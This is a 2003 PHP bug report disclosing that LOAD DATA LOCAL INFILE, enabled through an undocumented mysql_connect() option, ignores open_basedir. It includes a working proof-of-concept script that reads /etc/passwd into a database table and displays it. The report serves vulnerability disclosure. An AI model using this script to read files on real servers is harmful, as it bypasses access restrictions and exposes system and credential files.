#23779 [NEW]: LOAD DATA LOCAL isn't respecting open_basedir

From: Date: Fri, 23 May 2003 13:49:44 +0000
Subject: #23779 [NEW]: LOAD DATA LOCAL isn't respecting open_basedir
Groups: php.bugs 
Request: Send a blank email to php-bugs+get-40271@lists.php.net to get a copy of this message
From:             php at jkt dot wz dot cz
Operating system: any
PHP version:      4.3.1
PHP Bug Type:     MySQL related
Bug description:  LOAD DATA LOCAL isn't respecting open_basedir

i'm using php/4.3.0 (i haven't access to newer version), mysql/3.23.49 or
4.0.11-gamma; i haven't noticed any changes in cvs changelog
[http://cvs.php.net/co.php/php4/ChangeLog?login=2&r=1.1323]

if you made a connection with mysql_connect() and specify 128 as fifth
parameter (options), you can perform sql LOAD DATA LOCAL INFILE
statements. the file accesses are made by mysql client library, so you can
access any file which webserver process can access to, IGNORING
open_basedir option! (and perhaps also safe-mode uid/gid checks, i don't
know...)

test script:

  $user='**';
  $pass='**';
  $host='**';
  $db='**';
  $table='files';
  $filename='/etc/passwd';
  $line_term='-----------[line_terminator]------------';

  $m=mysql_connect($host, $user, $pass, false, 128);
  // connect with MYSQL_OPT_LOCAL_INFILE (in php manual undocumented)
option
  mysql_select_db($db, $m);
  mysql_query("create table if not exists $table (str text not null)",
$m);
  // create our table
  mysql_query('load data local infile "'.mysql_escape_string($filename).'"
into table '.$table.' lines terminated by
"'.mysql_escape_string($line_term).'"');
  // upload file
  echo "ok, upload success ;-)\n";
  $res=mysql_query("select * from $table", $m);
  // verify & display
  echo '<pre>';
  while($line=mysql_fetch_assoc($res)) {
    echo htmlspecialchars($line['str']);
  }
  echo '</pre>';
  mysql_query('truncate table '.$table, $m);
  echo 'have a nice day...';

-- 
Edit bug report at http://bugs.php.net/?id=23779&edit=1
-- 
Try a CVS snapshot:         http://bugs.php.net/fix.php?id=23779&r=trysnapshot
Fixed in CVS:               http://bugs.php.net/fix.php?id=23779&r=fixedcvs
Fixed in release:           http://bugs.php.net/fix.php?id=23779&r=alreadyfixed
Need backtrace:             http://bugs.php.net/fix.php?id=23779&r=needtrace
Try newer version:          http://bugs.php.net/fix.php?id=23779&r=oldversion
Not developer issue:        http://bugs.php.net/fix.php?id=23779&r=support
Expected behavior:          http://bugs.php.net/fix.php?id=23779&r=notwrong
Not enough info:            http://bugs.php.net/fix.php?id=23779&r=notenoughinfo
Submitted twice:            http://bugs.php.net/fix.php?id=23779&r=submittedtwice
register_globals:           http://bugs.php.net/fix.php?id=23779&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=23779&r=php3
Daylight Savings:           http://bugs.php.net/fix.php?id=23779&r=dst
IIS Stability:              http://bugs.php.net/fix.php?id=23779&r=isapi
Install GNU Sed:            http://bugs.php.net/fix.php?id=23779&r=gnused



Thread (13 messages)

« previous php.bugs (#40271) next »